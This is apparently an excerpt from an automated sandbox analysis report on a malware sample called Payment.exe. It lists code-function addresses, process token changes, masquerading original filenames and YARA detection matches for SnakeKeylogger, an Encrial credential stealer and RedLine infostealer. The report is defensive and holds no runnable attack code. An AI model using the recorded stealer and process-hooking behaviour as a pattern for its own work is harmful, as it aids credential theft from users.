Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C2DF0	8_2_071C2DF0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C44E8	8_2_071C44E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C68E8	8_2_071C68E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CB5E8	8_2_071CB5E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C80E8	8_2_071C80E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071CCDE8	8_2_071CCDE8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C16E9	8_2_071C16E9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_071C2DE0	8_2_071C2DE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07267168	8_2_07267168
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726EB50	8_2_0726EB50
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_072609E0	8_2_072609E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726E830	8_2_0726E830
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07260040	8_2_07260040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07269D28	8_2_07269D28
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726CF28	8_2_0726CF28
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07260500	8_2_07260500
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726B308	8_2_0726B308
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07268108	8_2_07268108
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07260510	8_2_07260510
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726E510	8_2_0726E510
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726A368	8_2_0726A368
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726D568	8_2_0726D568
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07268748	8_2_07268748
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726B948	8_2_0726B948
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726A9A8	8_2_0726A9A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_072677A8	8_2_072677A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726DBB0	8_2_0726DBB0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07268D88	8_2_07268D88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726BF88	8_2_0726BF88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726F190	8_2_0726F190
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726AFE8	8_2_0726AFE8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07267DE8	8_2_07267DE8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726E1F0	8_2_0726E1F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_072693C8	8_2_072693C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726C5C8	8_2_0726C5C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726F7D0	8_2_0726F7D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_072609D0	8_2_072609D0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07267DD8	8_2_07267DD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726B628	8_2_0726B628
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07268428	8_2_07268428
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07260006	8_2_07260006
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07269A08	8_2_07269A08
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726CC08	8_2_0726CC08
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726BC68	8_2_0726BC68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07268A68	8_2_07268A68
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726EE70	8_2_0726EE70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726D878	8_2_0726D878
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726D248	8_2_0726D248
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726A048	8_2_0726A048
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_072690A8	8_2_072690A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726C2A8	8_2_0726C2A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726F4B0	8_2_0726F4B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726A688	8_2_0726A688
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07267488	8_2_07267488
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726D888	8_2_0726D888
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07263498	8_2_07263498
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_072696E8	8_2_072696E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726C8E8	8_2_0726C8E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726FAF0	8_2_0726FAF0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726ACC8	8_2_0726ACC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07267AC8	8_2_07267AC8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0726DED0	8_2_0726DED0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07316128	8_2_07316128
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731C778	8_2_0731C778
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731B538	8_2_0731B538
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07318520	8_2_07318520
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07312F20	8_2_07312F20
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731F120	8_2_0731F120
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731F110	8_2_0731F110
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731AB18	8_2_0731AB18
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731611A	8_2_0731611A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07311300	8_2_07311300
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07314500	8_2_07314500
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07310360	8_2_07310360
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07313560	8_2_07313560
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07319960	8_2_07319960
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731C767	8_2_0731C767
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07317368	8_2_07317368
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731BF58	8_2_0731BF58
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07314B40	8_2_07314B40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07311940	8_2_07311940
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731FBB0	8_2_0731FBB0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073157B8	8_2_073157B8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731ADA1	8_2_0731ADA1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07313BA0	8_2_07313BA0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073109A0	8_2_073109A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731FBA2	8_2_0731FBA2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07311F80	8_2_07311F80
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07315180	8_2_07315180
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731A380	8_2_0731A380
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07317D89	8_2_07317D89
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073175F0	8_2_073175F0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07315DF8	8_2_07315DF8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07310FE0	8_2_07310FE0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073141E0	8_2_073141E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731C1E0	8_2_0731C1E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07319BE9	8_2_07319BE9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073125C0	8_2_073125C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731B7C0	8_2_0731B7C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073157C8	8_2_073157C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073191C8	8_2_073191C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07313230	8_2_07313230
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07318A30	8_2_07318A30
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07311620	8_2_07311620
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07314820	8_2_07314820
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731B029	8_2_0731B029
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07318010	8_2_07318010
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07312C00	8_2_07312C00
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07310007	8_2_07310007
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07315E08	8_2_07315E08
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07319E70	8_2_07319E70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07311C60	8_2_07311C60
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07314E60	8_2_07314E60
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731C469	8_2_0731C469
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07319450	8_2_07319450
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07313240	8_2_07313240
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07310040	8_2_07310040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731BA49	8_2_0731BA49
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731B2B0	8_2_0731B2B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07318CBA	8_2_07318CBA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073122A0	8_2_073122A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731DEA8	8_2_0731DEA8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073154A8	8_2_073154A8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731A890	8_2_0731A890
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731DE98	8_2_0731DE98
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731549A	8_2_0731549A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731829A	8_2_0731829A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07310680	8_2_07310680
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07313880	8_2_07313880
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731A0F8	8_2_0731A0F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073128E0	8_2_073128E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07315AE8	8_2_07315AE8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0731BCD0	8_2_0731BCD0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07315AD8	8_2_07315AD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073196DA	8_2_073196DA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07313EC0	8_2_07313EC0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07310CC0	8_2_07310CC0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073166C0	8_2_073166C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07334F88	8_2_07334F88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07339B88	8_2_07339B88
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07331AA0	8_2_07331AA0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073321F8	8_2_073321F8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073394B8	8_2_073394B8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073328E0	8_2_073328E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733F328	8_2_0733F328
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733F317	8_2_0733F317
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07338B00	8_2_07338B00
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733F772	8_2_0733F772
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07334F79	8_2_07334F79
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733F780	8_2_0733F780
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733FBD8	8_2_0733FBD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733C3C1	8_2_0733C3C1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733E620	8_2_0733E620
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733E610	8_2_0733E610
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07330273	8_2_07330273
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733EA78	8_2_0733EA78
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733EA69	8_2_0733EA69
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07331A90	8_2_07331A90
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733EED0	8_2_0733EED0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733EEC0	8_2_0733EEC0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733D918	8_2_0733D918
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733D908	8_2_0733D908
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07330D70	8_2_07330D70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733DD70	8_2_0733DD70
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_07330D60	8_2_07330D60
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733DD5F	8_2_0733DD5F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733E1BA	8_2_0733E1BA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073321E8	8_2_073321E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733E1C8	8_2_0733E1C8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733CC10	8_2_0733CC10
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733CC00	8_2_0733CC00
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733D068	8_2_0733D068
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733D059	8_2_0733D059
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733D4B0	8_2_0733D4B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073328D3	8_2_073328D3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_0733D4C0	8_2_0733D4C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C0728	8_2_073C0728
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C2300	8_2_073C2300
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C0040	8_2_073C0040
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C0E48	8_2_073C0E48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C29E8	8_2_073C29E8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C1530	8_2_073C1530
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C1C18	8_2_073C1C18
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C0718	8_2_073C0718
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C22F1	8_2_073C22F1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C0006	8_2_073C0006
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C0E38	8_2_073C0E38
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C29D9	8_2_073C29D9
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C1522	8_2_073C1522
Source: C:\Users\user\Desktop\Payment.exe	Code function: 8_2_073C1C09	8_2_073C1C09
Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_0055A810	14_2_0055A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_00537C00	14_2_00537C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_00562D40	14_2_00562D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_005379F0	14_2_005379F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_0055EEB0	14_2_0055EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_005592A0	14_2_005592A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_005593B0	14_2_005593B0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_012CD404	18_2_012CD404
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_030C0006	18_2_030C0006
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_030C0040	18_2_030C0040
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_032B8F2A	18_2_032B8F2A
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_032BDE50	18_2_032BDE50
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_032B80C8	18_2_032B80C8
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_032B80D8	18_2_032B80D8
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B93B38	18_2_08B93B38
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B9E8B0	18_2_08B9E8B0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B96B30	18_2_08B96B30
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B93B2A	18_2_08B93B2A
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B98FF0	18_2_08B98FF0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B96F68	18_2_08B96F68
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B973A0	18_2_08B973A0
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B97391	18_2_08B97391
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Code function: 18_2_08B98640	18_2_08B98640
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C07C00	19_2_00C07C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C2A810	19_2_00C2A810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C079F0	19_2_00C079F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C32D40	19_2_00C32D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C292A0	19_2_00C292A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C2EEB0	19_2_00C2EEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C293B0	19_2_00C293B0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00BBA810	21_2_00BBA810
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00B97C00	21_2_00B97C00
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00B979F0	21_2_00B979F0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00BC2D40	21_2_00BC2D40
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00BBEEB0	21_2_00BBEEB0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00BB92A0	21_2_00BB92A0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00BB93B0	21_2_00BB93B0
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_007551EE	23_2_007551EE
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_007939A3	23_2_007939A3
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00756EAF	23_2_00756EAF
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00785980	23_2_00785980
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_0078D580	23_2_0078D580
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_0078C7F0	23_2_0078C7F0
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00757F80	23_2_00757F80
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 23_2_00783780	23_2_00783780
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_0074A810	27_2_0074A810
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_00727C00	27_2_00727C00
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_00752D40	27_2_00752D40
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_007279F0	27_2_007279F0
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_0074EEB0	27_2_0074EEB0
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_007492A0	27_2_007492A0
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_007493B0	27_2_007493B0
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Code function: 28_2_007FA810	28_2_007FA810
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Code function: 28_2_007D7C00	28_2_007D7C00

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\Payment.exe

Code function: String function: 0040E1D8 appears 42 times

Source: updater.exe0.8.dr

Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71

Source: elevation_service.exe0.8.dr

Static PE information: Number of sections : 12 > 10

Source: Payment.exe, 00000000.00000002.909679657.0000000007168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePoBx vs Payment.exe
Source: Payment.exe, 00000000.00000002.909679657.0000000007168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameiy vs Payment.exe
Source: Payment.exe, 00000000.00000002.909679657.0000000007168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcVJ.exe@ vs Payment.exe
Source: Payment.exe, 00000000.00000002.910163937.0000000008FA1000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payment.exe
Source: Payment.exe	Binary or memory string: OriginalFilename vs Payment.exe
Source: Payment.exe, 00000008.00000002.2103283935.0000000000436000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Payment.exe
Source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Payment.exe
Source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs Payment.exe
Source: Payment.exe, 00000008.00000002.2146723496.0000000003898000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs Payment.exe
Source: Payment.exe, 00000008.00000002.2121846551.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Payment.exe
Source: Payment.exe	Binary or memory string: OriginalFilenamevcVJ.exe@ vs Payment.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: Payment.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 18.2.jwBqGZseW.exe.43414a8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.jwBqGZseW.exe.43414a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.jwBqGZseW.exe.44e24c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
